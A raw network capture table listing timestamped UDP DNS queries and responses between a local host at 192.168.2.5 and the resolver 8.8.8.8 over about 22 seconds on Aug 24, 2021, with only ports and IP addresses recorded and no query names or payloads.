Aug 24, 2021 08:50:48.725732088 CEST	53	50401	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.742047071 CEST	53	61389	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.898452044 CEST	51562	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.898621082 CEST	60859	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:48.922950983 CEST	53	60859	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:48.933299065 CEST	53	51562	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.106616020 CEST	64673	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.138709068 CEST	53	64673	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.314182043 CEST	57749	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.338469982 CEST	53	57749	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.436702967 CEST	60139	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.531477928 CEST	53	60139	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.532576084 CEST	58033	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.564568996 CEST	53	58033	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.671598911 CEST	61101	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.698725939 CEST	53	61101	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.840672016 CEST	59490	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.877774000 CEST	53	59490	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.931909084 CEST	55591	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.932452917 CEST	55172	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.932543039 CEST	49474	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:49.956733942 CEST	53	55172	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.964420080 CEST	53	49474	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:49.966875076 CEST	53	55591	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:50.133924961 CEST	58185	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:50.194643021 CEST	53	58185	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:50.691607952 CEST	52076	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:50.716054916 CEST	53	52076	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:50.769092083 CEST	57236	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:50.793414116 CEST	53	57236	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:50.867628098 CEST	56844	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:50.902594090 CEST	53	56844	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:50.971249104 CEST	63224	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:50.985129118 CEST	54580	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.004492044 CEST	53	63224	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.012351990 CEST	53	54580	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.135422945 CEST	64716	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.169329882 CEST	53	64716	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.232356071 CEST	62806	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.245460033 CEST	64419	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.261337042 CEST	53	62806	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.270926952 CEST	53	64419	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.283466101 CEST	57655	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.309531927 CEST	53	57655	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.345012903 CEST	58760	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.377073050 CEST	53	58760	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.428423882 CEST	63037	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.452927113 CEST	53	63037	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.495171070 CEST	57354	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.509479046 CEST	54398	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.514127970 CEST	57020	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.533588886 CEST	53	57354	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.539733887 CEST	53	54398	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.540167093 CEST	53	57020	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.574146032 CEST	62439	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.599510908 CEST	53	62439	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.624217987 CEST	50089	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.649600029 CEST	53	50089	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.699341059 CEST	60539	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.722165108 CEST	59621	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.731543064 CEST	53	60539	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.749413967 CEST	53	59621	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.797396898 CEST	64229	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.822792053 CEST	53	64229	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.884459019 CEST	57781	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.919507980 CEST	53	57781	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:51.970747948 CEST	50389	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:51.997916937 CEST	53	50389	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:52.001027107 CEST	62575	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:52.025481939 CEST	53	62575	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:52.317636013 CEST	57585	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:52.349787951 CEST	53	57585	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:52.505599022 CEST	52431	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:52.534840107 CEST	53	52431	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:52.782088995 CEST	51966	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:52.787226915 CEST	49978	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:52.807382107 CEST	53	51966	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:52.819158077 CEST	53	49978	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.029735088 CEST	55905	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.057209015 CEST	53	55905	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.297087908 CEST	64814	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.305318117 CEST	61289	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.330641031 CEST	53	61289	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.331918955 CEST	53	64814	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.567866087 CEST	52623	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.594985008 CEST	53	52623	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.655708075 CEST	61615	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.682704926 CEST	53	61615	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.837614059 CEST	62599	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.869530916 CEST	53	62599	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:53.878125906 CEST	65345	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:53.903759003 CEST	53	65345	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.263416052 CEST	56171	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.288378954 CEST	53	56171	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.334435940 CEST	53070	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.361656904 CEST	53	53070	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.416109085 CEST	52715	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.448429108 CEST	53	52715	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.501785040 CEST	55447	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.528732061 CEST	53	55447	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.549796104 CEST	62531	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.574280024 CEST	53	62531	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.642529964 CEST	63693	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.643546104 CEST	59783	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.669553995 CEST	53	63693	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.865803957 CEST	63674	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.887020111 CEST	53	59783	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.924165010 CEST	59692	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:54.954272032 CEST	53	63674	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:54.989808083 CEST	53	59692	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.107502937 CEST	50947	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.132822037 CEST	53	50947	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.386867046 CEST	54042	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.387156963 CEST	62964	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.411355019 CEST	53	62964	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.418781042 CEST	53	54042	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.596642017 CEST	52105	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.622045994 CEST	53	52105	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.805685043 CEST	49775	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.830532074 CEST	59123	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:55.831067085 CEST	53	49775	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:55.854901075 CEST	53	59123	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.109888077 CEST	53671	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.143467903 CEST	53	53671	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.168009996 CEST	54068	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.168531895 CEST	57940	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.194896936 CEST	53	57940	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.194976091 CEST	53	54068	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.435128927 CEST	61585	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.462121010 CEST	53	61585	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.482614040 CEST	53715	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.507987022 CEST	53	53715	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.532797098 CEST	63041	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.558306932 CEST	53	63041	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.572326899 CEST	51407	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.607177019 CEST	53	51407	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.643341064 CEST	54988	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.667645931 CEST	53	54988	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.720854998 CEST	61184	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.731410027 CEST	52468	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.736763954 CEST	60317	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.748074055 CEST	53	61184	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.755656004 CEST	53	52468	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.779699087 CEST	53	60317	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.813963890 CEST	55510	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.847137928 CEST	53	55510	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.873152018 CEST	50748	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.910758972 CEST	53	50748	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:56.937314987 CEST	56903	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:56.990200996 CEST	60813	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.017473936 CEST	53	60813	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.108047962 CEST	59036	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.121022940 CEST	53	56903	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.132987022 CEST	53	59036	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.173196077 CEST	52339	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.199059963 CEST	53	52339	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.268424034 CEST	59373	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.300460100 CEST	53	59373	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.340171099 CEST	52730	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.359497070 CEST	61088	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.364624977 CEST	53	52730	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.383975029 CEST	53	61088	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.411894083 CEST	50856	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.436444044 CEST	53	50856	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.450592995 CEST	50215	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.477695942 CEST	53	50215	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.497172117 CEST	63530	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.521569967 CEST	53	63530	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.660301924 CEST	55517	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.693545103 CEST	53	55517	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.778073072 CEST	61207	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.799365044 CEST	61034	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:57.803617954 CEST	53	61207	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:57.827342987 CEST	53	61034	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:58.115684032 CEST	51394	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:58.134332895 CEST	58238	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:58.150616884 CEST	53	51394	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:58.158691883 CEST	53	58238	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:58.493510962 CEST	52462	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:58.528125048 CEST	53	52462	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:58.779577017 CEST	58635	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:58.806608915 CEST	53	58635	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:58.972157955 CEST	51269	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:58.996463060 CEST	53	51269	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.066301107 CEST	63360	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.093728065 CEST	53	63360	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.103043079 CEST	56929	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.135019064 CEST	53	56929	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.192188025 CEST	63280	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.217012882 CEST	53	63280	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.380579948 CEST	60930	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.407733917 CEST	53	60930	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.557105064 CEST	60766	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.584343910 CEST	53	60766	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.659188986 CEST	54539	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.686464071 CEST	53	54539	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.720877886 CEST	49838	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.746121883 CEST	53	49838	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.798669100 CEST	55226	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.833568096 CEST	53	55226	8.8.8.8	192.168.2.5
Aug 24, 2021 08:50:59.936197996 CEST	65187	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:50:59.971043110 CEST	53	65187	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.313167095 CEST	63394	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.339749098 CEST	53	63394	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.465769053 CEST	63482	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.495810986 CEST	53	63482	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.656196117 CEST	52587	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.691288948 CEST	53	52587	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.729048014 CEST	51776	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.757822037 CEST	53	51776	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.846339941 CEST	62460	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.874025106 CEST	53	62460	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:00.927592039 CEST	64629	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:00.956497908 CEST	53	64629	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:01.086968899 CEST	62982	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:01.113245964 CEST	53	62982	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:01.786490917 CEST	52326	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:01.813704967 CEST	53	52326	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:02.094145060 CEST	60425	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:02.323807001 CEST	51214	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:02.327334881 CEST	53	60425	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:02.384479046 CEST	53	51214	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.486288071 CEST	61235	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.519567966 CEST	53	61235	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.535037041 CEST	60601	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.535315990 CEST	51214	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.559459925 CEST	53	51214	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.568056107 CEST	53	60601	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.726380110 CEST	63159	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.756288052 CEST	53	63159	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.798247099 CEST	57040	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.825023890 CEST	53	57040	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.842766047 CEST	58291	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.872401953 CEST	53	58291	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.892827988 CEST	60342	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.920063019 CEST	53	60342	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:03.956800938 CEST	63015	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.978801012 CEST	62176	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:03.984091997 CEST	53	63015	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:04.014050961 CEST	53	62176	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:05.526077986 CEST	59422	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:05.554224014 CEST	53	59422	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:05.596307039 CEST	55710	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:05.621459007 CEST	53	55710	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:05.796845913 CEST	60312	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:05.825220108 CEST	53	60312	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:05.877262115 CEST	63500	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:05.901695013 CEST	53	63500	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.053561926 CEST	63783	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.107882023 CEST	61500	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.115955114 CEST	53	63783	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.132287025 CEST	53	61500	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.136970997 CEST	52153	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.170816898 CEST	61368	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.171077967 CEST	53	52153	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.196222067 CEST	53	61368	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.209219933 CEST	57817	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.234589100 CEST	53	57817	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.281125069 CEST	52228	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.306971073 CEST	53	52228	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.435890913 CEST	60446	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.463135004 CEST	53	60446	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.524929047 CEST	49990	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.549384117 CEST	53	49990	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:06.866883993 CEST	57513	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:06.892138958 CEST	53	57513	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.036696911 CEST	50490	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.079912901 CEST	53	50490	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.148051977 CEST	53685	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.180056095 CEST	53	53685	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.234250069 CEST	60036	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.265918016 CEST	53	60036	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.446901083 CEST	50739	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.472501993 CEST	53	50739	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.494518995 CEST	53555	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.519170046 CEST	53	53555	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.553772926 CEST	62286	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.581084013 CEST	53	62286	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.600720882 CEST	59512	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.630269051 CEST	53	59512	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.822844028 CEST	63152	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.850053072 CEST	53	63152	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.898046017 CEST	52145	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.926480055 CEST	53	52145	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:07.964318037 CEST	60776	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:07.988867044 CEST	53	60776	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.016828060 CEST	54755	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.051762104 CEST	53	54755	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.078572989 CEST	50996	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.109747887 CEST	53	50996	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.162746906 CEST	49370	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.194772005 CEST	53	49370	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.212114096 CEST	58975	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.236553907 CEST	53	58975	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.308532000 CEST	56811	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.336667061 CEST	53	56811	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.881127119 CEST	58098	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:08.907262087 CEST	53	58098	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:08.989871979 CEST	62011	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.020910025 CEST	53	62011	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:09.146878958 CEST	64802	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.153620958 CEST	62658	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.179106951 CEST	53	62658	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:09.182276964 CEST	53	64802	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:09.228378057 CEST	55172	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.253112078 CEST	53	55172	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:09.628966093 CEST	65150	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.656040907 CEST	53	65150	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:09.698446035 CEST	58359	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:09.722670078 CEST	53	58359	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.143352032 CEST	60399	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.167727947 CEST	53	60399	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.207554102 CEST	61541	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.231873989 CEST	53	61541	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.282567024 CEST	51643	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.307293892 CEST	53	51643	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.337451935 CEST	59557	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.361743927 CEST	53	59557	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.389774084 CEST	54415	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.414093971 CEST	53	54415	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.448352098 CEST	50128	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.472664118 CEST	53	50128	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.553411961 CEST	50193	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.588682890 CEST	53	50193	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.633003950 CEST	53065	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.668009043 CEST	53	53065	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.716881037 CEST	56982	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.742666960 CEST	53	56982	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.764628887 CEST	56775	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.789047956 CEST	53	56775	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.798003912 CEST	58349	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:10.826589108 CEST	53	58349	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:10.844233036 CEST	59489	53	192.168.2.5	8.8.8.8
